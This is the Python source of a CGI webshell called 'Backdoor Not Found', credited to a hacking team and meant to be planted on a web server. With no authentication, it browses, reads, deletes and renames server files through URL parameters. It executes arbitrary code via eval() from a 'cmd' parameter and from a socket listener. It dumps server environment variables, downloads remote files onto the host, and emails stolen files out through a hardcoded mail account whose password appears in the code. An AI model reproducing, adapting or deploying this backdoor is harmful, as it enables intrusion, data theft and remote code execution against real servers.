# -*- coding: cp936 -*- #encoding=utf8 # #Backdoor Not Found #Version: 1.3 #Author: 余弦 | 2009-3-3 #Team: xeye hack team | http://www.xeye.us/ # #Description: #python版的webshell,在支持python并支持web正常访问的环境下使用 #务必谨慎使用,python的权限有的时候是很大的:) import sys, os import re import cgi import time import socket import shutil import urllib import urllib2 import smtplib from email.Header import Header from email.MIMEText import MIMEText from email.MIMEMultipart import MIMEMultipart #sys.stderr = sys.stdout #初始化变量++++++++++++++++++++++++++++++++++++++++++++++++++++ #该程序依据path参数标志出当前所在目录,此变量不需修改 #例如: http://www.test.com/w3bsh3ll.py?path=. path = '.' #SELF_NAME的指必须与该程序的文件名相同 SELF_NAME = 'webshell.py' #初始化变量++++++++++++++++++++++++++++++++++++++++++++++++++++ class XeyeHandle: def __init__(self): pass def isExists(self, resource): try: if os.path.exists(resource): return True else: return False except: return False def listDir(self, path): try: return os.listdir(path) except: print '路径错误。' return [] def listFormatedDir(self, path): allDir = self.listDir(path) os.chdir(path) print '' print '' for i in allDir: if os.path.isdir(i): print ''\ %('' + i + '', self.lastModified(i), self.resourceMode(i), \ 'Del/Rename') for i in allDir: if not os.path.isdir(i): print ''\ %(i, self.lastModified(i), self.fileSize(i), self.resourceMode(i), \ 'R/C/D/\ Del/Rename') print '
资源最后修改时间大小模式操作
%s%s-%s%s
%s%s%sKB%s%s
' def currentPath(self): return os.getcwd() def url(self): return 'http://' + os.environ['SERVER_NAME'] + os.environ['SCRIPT_NAME'] def lastModified(self, resource): m = os.path.getmtime(resource) return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(m)) def fileSize(self, _file): s = str(os.path.getsize(_file)/1024.0) site = s.split('.')[0] + '.' + s.split('.')[1][:2] return site def resourceMode(self, resource): xrw = '' if os.access(resource, os.R_OK): xrw += 'R/' else: xrw += '-/' if os.access(resource, os.W_OK): xrw += 'W/' else: xrw += '-/' if os.access(resource, os.X_OK): xrw += 'X' else: xrw += '-' return xrw def delFold(self, fold): try: __str = str(fold).split('/') __fold = __str[len(__str)-1:len(__str)][0] except: __fold = fold try: os.rmdir(fold) return '目录(' + __fold + ')删除成功。' except: return '目录(' + __fold + ')删除失败。' def delFile(self, _file): try: __str = str(_file).split('/') __file = __str[len(__str)-1:len(__str)][0] except: __file = _file try: os.unlink(_file) return '文件(' + __file + ')删除成功。' except: return '文件(' + __file + ')删除失败。' def rename(self, resource1, resource2): try: __str = str(resource1).split('/') __resource1 = __str[len(__str)-1:len(__str)][0] __str = str(resource2).split('/') __resource2 = __str[len(__str)-1:len(__str)][0] except: __resource1 = resource1 __resource2 = resource2 try: os.rename(resource1, resource2) return __resource1 + '重命名为' + __resource2 + '成功。' except: return __resource1 + '重命名为' + __resource2 + '失败。' def copyFile(self, resource1, resource2): try: __str = str(resource1).split('/') __resource1 = __str[len(__str)-1:len(__str)][0] except: __resource1 = resource1 __resource2 = resource2 try: shutil.copyfile(resource1, resource2) return __resource1 + '复制到' + __resource2 + '成功。' except: return __resource1 + '复制到' + __resource2 + '失败。' def createFold(self, fold): try: os.mkdir(fold) return '文件夹' + str(fold) + '创建成功。' except: return '文件夹' + str(fold) + '创建失败。' def getFileContent(self, _file): f = open(_file, 'r') flist = f.readlines() f.close() content = ''.join(flist) #try: #content = content.decode('utf-8').encode('gb2312') #except: #pass return self.escape(content).replace('\n','
') def serverInfo(self, environ=os.environ): keys = environ.keys() keys.sort() i = 0 info = '' info += '' for key in keys: info += '' info += '
名称
'+self.escape(key)+''+self.escape(environ[key])+'
' return info def get(self, name): q_str = os.environ['QUERY_STRING'] q_list = q_str.split('&') for q in q_list: if q.split('=')[0].lower() == name: return urllib.unquote(q.split('=')[1]) def escape(self, content): content = content.replace("&", "&") content = content.replace("<", "<") content = content.replace(">", ">") if 0: content = content.replace('"', """) return content def startSocket(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(('60.32.52.10', 8077)) sock.listen(3) while True: connection,address = sock.accept() #connection.settimeout(5) bufcmd = connection.recv(1024) print 'your command is:
' print bufcmd print '
--------------------------------------

' if bufcmd == 'exit': print 'socket exit......
' connection.send('bye!') break else: try: print bufcmd + '>> eval result:
' print eval(bufcmd) + '
' connection.send('success!') except: print '指令执行失败......
' connection.send('fail!') def evalCmd(self, cmd): yourcmd = urllib.unquote(cmd) try: print yourcmd + '>> eval result:
' print eval(yourcmd) + '
' except: print '指令执行失败......
' def uploadFile(self, url, localpath): try: urllib.urlretrieve(url,localpath) return '文件' + url + '上传成功。' except: return '文件' + url + '上传失败。' def email(self, _to, _file): try: __str = str(_file).split('/') __file = __str[len(__str)-1:len(__str)][0] except: __file = _file try: msg = MIMEMultipart() att = MIMEText(open(_file, 'rb').read(), 'base64', 'gb2312') att["Content-Type"] = 'application/octet-stream' att["Content-Disposition"] = 'attachment; filename=' + __file msg.attach(att) msg['to'] = _to msg['from'] = 'supern0va@126.com' msg['subject'] = Header('from py_webshell: ' + __file, 'utf-8') server = smtplib.SMTP('smtp.126.com') server.login('supern0va@126.com', 'supernova *') server.sendmail(msg['from'], msg['to'], msg.as_string()) server.close return '文件' + __file + '发送到' + _to + '成功。' except: return '文件' + __file + '发送到' + _to + '失败。' __x = XeyeHandle() print """Content-type: text/html Backdoor Not Found """ #form = cgi.FieldStorage() #print 'cgi form', form.keys() #delete file try: del_file = __x.get('delfile') try: path = __x.get('path') except: path = '' if del_file: print __x.delFile(del_file), '| 返回' print '
' except: pass #delete fold try: del_fold = __x.get('delfold') try: path = __x.get('path') except: path = '' if del_fold: print __x.delFold(del_fold), '| 返回' print '
' except: pass #rename file or fold try: oldname = __x.get('oldname') newname = __x.get('newname') try: path = __x.get('path') except: path = '' if oldname and newname: print __x.rename(oldname, newname), '| 返回' print '
' except: pass #copy file try: copyname = __x.get('copyname') newname = __x.get('newname') try: path = __x.get('path') except: path = '' if copyname and newname: print __x.copyFile(copyname, newname), '| 返回' print '
' except: pass #create fold try: createfold = __x.get('createfold') try: path = __x.get('path') except: path = '' if createfold: print __x.createFold(createfold), '| 返回' print '
' except: pass #upload file from internet try: targeturl = __x.get('targeturl') localpath = __x.get('localpath') try: path = __x.get('path') except: path = '' if targeturl and localpath: print __x.uploadFile(targeturl, localpath), '| 返回' print '
' except: pass #mail file to target-email try: mailto = __x.get('emailto') mailfile = __x.get('emailfile') try: path = __x.get('path') except: path = '' if mailto and mailfile: print __x.email(mailto, mailfile), '| 返回' print '
' except: pass #read content of file try: readfile = __x.get('readfile') try: path = __x.get('path') except: path = '' if readfile: print '文件内容如下: | 返回' print '
-------------------------------------------------------------

' print __x.getFileContent(readfile) print '

-------------------------------------------------------------

' except: pass #server info try: serverinfo = __x.get('serverinfo') try: path = __x.get('path') except: path = '' if serverinfo == "true": print '服务器信息如下: | 返回' print '
-------------------------------------------------------------

' print __x.serverInfo() print '

-------------------------------------------------------------

' except: pass #socket connection try: socketinfo = __x.get('socket') try: path = __x.get('path') except: path = '' if socketinfo == "true": print 'Socket通信执行如下: | 返回' print '
-------------------------------------------------------------

' __x.startSocket() print '

-------------------------------------------------------------

' except: pass #eval cmd try: cmd = __x.get('cmd') try: path = __x.get('path') except: path = '' if cmd: print '命令执行结果如下: | 返回' print '
-------------------------------------------------------------

' __x.evalCmd(cmd) print '

-------------------------------------------------------------

' except: pass print "
" print "" print """

""" print 'Webshell目录 | 创建目录 \ | 上传文件 | Email发送文件 \ | 执行命令 | Socket反弹 \ | 服务器信息 |

' try: path = __x.get('path') if path == '' or path == '.': print "当前路径(" + __x.currentPath() + ")下的资源:
" __x.listFormatedDir('.') else: print "当前路径(" + path + ")下的资源:
" __x.listFormatedDir(path) except: print "当前路径(" + __x.currentPath() + ")下的资源:
" __x.listFormatedDir('.') print """
(C)xeye hack team """